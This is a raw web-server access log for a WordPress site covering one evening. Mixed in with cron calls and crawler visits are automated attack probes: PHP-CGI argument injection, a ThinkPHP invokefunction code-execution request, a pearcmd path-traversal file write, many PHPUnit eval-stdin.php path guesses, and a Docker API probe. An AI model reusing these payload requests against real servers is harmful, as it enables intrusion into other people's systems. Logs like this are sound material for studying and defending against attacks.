178.128.90.221 - - [29/Nov/2025:20:15:50 +0800] "GET /geoip/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.90.221 - - [29/Nov/2025:20:15:50 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.90.221 - - [29/Nov/2025:20:15:50 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.128.90.221 - - [29/Nov/2025:20:15:51 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:20:23:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764419016.0400669574737548828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
116.129.114.238 - - [29/Nov/2025:20:23:36 +0800] "GET /admin HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
116.129.114.238 - - [29/Nov/2025:20:23:40 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
116.129.114.238 - - [29/Nov/2025:20:23:41 +0800] "GET /wp-login.php?redirect_to=http://cqqizhou.com/wp-admin/&reauth=1 HTTP/1.1" 200 2782 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:20:38:01 +0800] "POST /wp-cron.php?doing_wp_cron=1764419881.3480989933013916015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:20:38:01 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:20:38:55 +0800] "POST /wp-cron.php?doing_wp_cron=1764419935.7766408920288085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
220.181.108.159 - - [29/Nov/2025:20:38:55 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fbug%2F HTTP/1.1" 200 1106 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.51.120 - - [29/Nov/2025:20:39:11 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:20:42:52 +0800] "POST /wp-cron.php?doing_wp_cron=1764420172.3134939670562744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.188 - - [29/Nov/2025:20:42:52 +0800] "GET /sitemaps.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.123 - - [29/Nov/2025:20:43:02 +0800] "GET /sitemaps.xml HTTP/1.1" 404 8989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:20:53:22 +0800] "POST /wp-cron.php?doing_wp_cron=1764420802.0251760482788085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
34.77.152.43 - - [29/Nov/2025:20:53:22 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [29/Nov/2025:20:54:01 +0800] "POST /wp-cron.php?doing_wp_cron=1764420841.5886681079864501953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:20:54:01 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [29/Nov/2025:20:54:03 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [29/Nov/2025:21:13:52 +0800] "POST /wp-cron.php?doing_wp_cron=1764422032.2702391147613525390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
85.214.10.56 - - [29/Nov/2025:21:13:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
36.133.115.36 - - [29/Nov/2025:21:19:23 +0800] "POST /wp-cron.php?doing_wp_cron=1764422363.1870069503784179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
145.220.91.19 - - [29/Nov/2025:21:19:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0"
36.133.115.36 - - [29/Nov/2025:21:24:21 +0800] "POST /wp-cron.php?doing_wp_cron=1764422661.4928510189056396484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.153.54.14 - - [29/Nov/2025:21:24:21 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:21:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1764422728.8084440231323242187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
103.203.56.1 - - [29/Nov/2025:21:25:28 +0800] "GET / HTTP/1.1" 301 5 "-" "HTTP Banner Detection (https://security.ipip.net)"
36.133.115.36 - - [29/Nov/2025:21:46:12 +0800] "POST /wp-cron.php?doing_wp_cron=1764423972.1882638931274414062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
120.71.59.24 - - [29/Nov/2025:21:46:12 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:21:51:38 +0800] "POST /wp-cron.php?doing_wp_cron=1764424298.3105719089508056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
206.168.34.125 - - [29/Nov/2025:21:51:38 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [29/Nov/2025:22:01:38 +0800] "POST /wp-cron.php?doing_wp_cron=1764424898.1579439640045166015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:22:01:38 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:22:17:00 +0800] "POST /wp-cron.php?doing_wp_cron=1764425820.4647350311279296875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.166.7.113 - - [29/Nov/2025:22:17:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.7.113 - - [29/Nov/2025:22:17:03 +0800] "GET / HTTP/1.1" 200 33525 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Nov/2025:22:36:06 +0800] "POST /wp-cron.php?doing_wp_cron=1764426966.8863821029663085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
198.58.96.57 - - [29/Nov/2025:22:36:06 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
36.133.115.36 - - [29/Nov/2025:22:38:35 +0800] "POST /wp-cron.php?doing_wp_cron=1764427115.7508540153503417968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
3.93.173.184 - - [29/Nov/2025:22:38:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:22:40:20 +0800] "POST /wp-cron.php?doing_wp_cron=1764427220.6904590129852294921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:22:40:21 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [29/Nov/2025:22:44:33 +0800] "POST /wp-cron.php?doing_wp_cron=1764427473.7713069915771484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.191 - - [29/Nov/2025:22:44:33 +0800] "GET /sitemaps.xml HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.174 - - [29/Nov/2025:22:44:44 +0800] "GET /sitemaps.xml HTTP/1.1" 404 8990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:22:54:47 +0800] "POST /wp-cron.php?doing_wp_cron=1764428087.0845429897308349609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [29/Nov/2025:22:54:47 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [29/Nov/2025:22:54:48 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 499 0 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [29/Nov/2025:23:32:54 +0800] "POST /wp-cron.php?doing_wp_cron=1764430374.1178660392761230468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [29/Nov/2025:23:32:54 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Nov/2025:23:43:41 +0800] "POST /wp-cron.php?doing_wp_cron=1764431021.9120531082153320312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.215.164.205 - - [29/Nov/2025:23:43:42 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:45 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 152189 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:45 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:46 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:46 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:47 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:47 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:47 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:48 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:48 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:49 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:49 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:49 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:50 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:50 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:51 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:52 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:52 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:52 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:54 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:55 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:55 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:56 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:57 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:57 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:58 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:59 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:43:59 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:00 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:00 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:03 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:06 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:06 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:07 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:08 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:09 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:09 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:11 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:12 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [29/Nov/2025:23:44:18 +0800] "POST /wp-cron.php?doing_wp_cron=1764431057.9148130416870117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.215.164.205 - - [29/Nov/2025:23:44:18 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65390 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:21 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:22 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 152189 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:27 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 152189 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:29 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
185.215.164.205 - - [29/Nov/2025:23:44:30 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
42.234.19.224 - - [29/Nov/2025:23:47:14 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:23:47:19 +0800] "POST /wp-cron.php?doing_wp_cron=1764431238.9779369831085205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
27.98.254.65 - - [29/Nov/2025:23:47:19 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
27.98.254.65 - - [29/Nov/2025:23:47:26 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Nov/2025:23:48:27 +0800] "POST /wp-cron.php?doing_wp_cron=1764431307.4224920272827148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
167.94.138.171 - - [29/Nov/2025:23:48:27 +0800] "GET /sitemap.xml HTTP/1.1" 200 499 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"